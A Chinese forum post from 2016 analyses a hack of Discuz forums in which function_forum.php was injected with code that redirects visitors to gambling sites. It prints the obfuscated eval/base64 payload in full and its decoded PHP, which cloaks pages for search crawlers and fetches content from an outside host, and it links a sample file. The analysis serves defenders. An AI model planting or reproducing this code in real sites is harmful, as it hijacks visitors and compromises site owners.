Discuz论坛function_forum.php被植入恶意代码访问跳转到博彩网站的案列分析

民审-M · 发表于 2016-7-6 16:12:02

本帖最后由民审-M 于 2016-7-6 16:13 编辑

最近，核心会员网站接连被人植入恶意代码，访问会被跳转到博彩网站，而且每个跳转网址还不一样，经过检测，发现注入点在function_forum.php文件，分析如下：
QQ截图20160706160857.jpg

恶意代码：

eval(gzinflate(base64_decode('DdNHkqNWAADQ/VxkuosFfDI1trsQSSChT04bFzmKHASnt98d3s8/f/2M1fjrV77H3Vd51X3RxWv+lcRLTpP/Znk6ZPnXbzF73dNpVXleNHcbPRlfu7W8PaCrTfq1IEkSmCQncyZtbfX6URT9Ka1EU6AocxF5kH2w9PxwXr9W2ctfvIbd3w/i6FBUZdtNCDTqg0QxHI0XN/CnmKxPO2hXfgM4F/jUjtfDq0i70VRlp0iAdUt45qPwjWG8JE8eydZa0tnTN4xZoZwcnso66NLyEeJbZdrgTbd6YiB47hXvW72SPT2+hWw2etvFzhSHkgUvUW8IapgIykhUUaJtjknZXYPUwH0IXmL1ckPClalA4UMVUxQqlFQvH8/64aa6JAbKHcvjkz3MKARd94TlSdLaw1ojCaR3Q+U5atTeWMUHMB7EpFpw4l5E/PKJmSsqM9orT7wkoA7UhY7vWjVbYmGWUD3mDemNeiXo5mISSi2Dy6eT4B3uqNorHbaetHXzwGSk3e4Kz160+qL1XC/o8ijevKPHoSrHqX3RTQl9pxBlzq9kLnYvcmRH93zEqFyR8OgBht91/bzNGGF7mlbg2X0Daped4qK0swHSaZLCFhTmkKKn4Io+cAin2zhcypGFuI21LMuPSYfyMxhDZEwxlpdmak1IbFcOzEtvH+nS6ipqqM9opX7Dv4Jy5uVVMCGn3PUWuJm7kxKPzG6t6pAMkJbWdIaXX+5zCQn0aou0PqEXB6FRkWaI2pBmmaz7HKmw3lb0XU2b2+Xk80LgreK9kaT5V35oTPt0PIwRskXiRHHFXkQIndQuKjOX+yUFPo6VbRM3RJ5Zd7AR2aMDJbN1j9M+nzRH1nJ0s+FRJLv/Ir1B9tVP/KCFxHR9C8fQqqsmG22s8MPjoLGAskyDY06LB2xlPVnXsLG3Nx+SL41X0TPdVHeJ0qg2amdwDQVIspCkCh2pWCOOa/7wZvPpKEIDyFaknGf7YCSEiS1aixI7HfgjV4BxHS845lU0GlXQGYArAoJF9x5xUJP9+/f39/efXz//p/4P')));

复制代码

加密信息，解密后如下：

代码如下：

?><?php
?><?php
?><?php
?><?php
?><?php
session_start();
error_reporting(E_ERROR);
function IstmdsbSpider(){
$ValidEntry=false;
If(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("baidu.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("sogou.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("google.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("soso.com")) > 0 )
{
$ValidEntry = true;
}
return $ValidEntry;
}
function ChecktmdsbRefresh(){
$ValidEntry=false;
If(strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("baidu.com")) > 0 or strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("sogou.com")) > 0 or strpos(strtolower($_SERVER['HTTP_REFERER']),strtolower("google.com")) > 0 or strpos(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower("soso.com")) > 0 )
{
$ValidEntry = true;
}
return $ValidEntry;
}
function Checktmdsburl(){
$ValidEntry=false;
if (strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("topicview=")) > 0 or strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("content____")) > 0 or strpos(strtolower($_SERVER["REQUEST_URI"]),strtolower("Pp")) > 0)
{
$ValidEntry = true;
}
return $ValidEntry;
}
if (!IstmdsbSpider())
{
if (ChecktmdsbRefresh())
if (Checktmdsburl())
{
header( "location: http://www.fuckworld.org/ad/ad.htm?".$_SERVER['SERVER_NAME']);
exit();
}
}else{
echo file_get_contents("http://ri.toh.info:8080/");
ob_end_flush();
}
?><?
?><?
?><?
?><?
?><?

复制代码

样本：

function_forum.zip (9.21 KB, 下载次数: 1)

警告：请大家注意论坛目录权限设置，做好安全防御，如有任何协助咨询 @小草根获取帮助。